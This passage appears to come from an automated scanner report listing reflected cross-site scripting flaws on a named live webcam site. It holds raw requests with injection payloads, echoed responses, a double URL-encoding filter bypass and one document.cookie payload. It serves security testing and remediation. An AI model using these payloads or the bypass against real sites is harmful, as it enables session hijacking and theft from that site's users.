This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:11 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /warningms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 14469 Vary: Accept-Encoding
2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 75081 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad ...[SNIP]...
2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:53 GMT Connection: close Content-Length: 74955 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1 ...[SNIP]...
2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://in.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
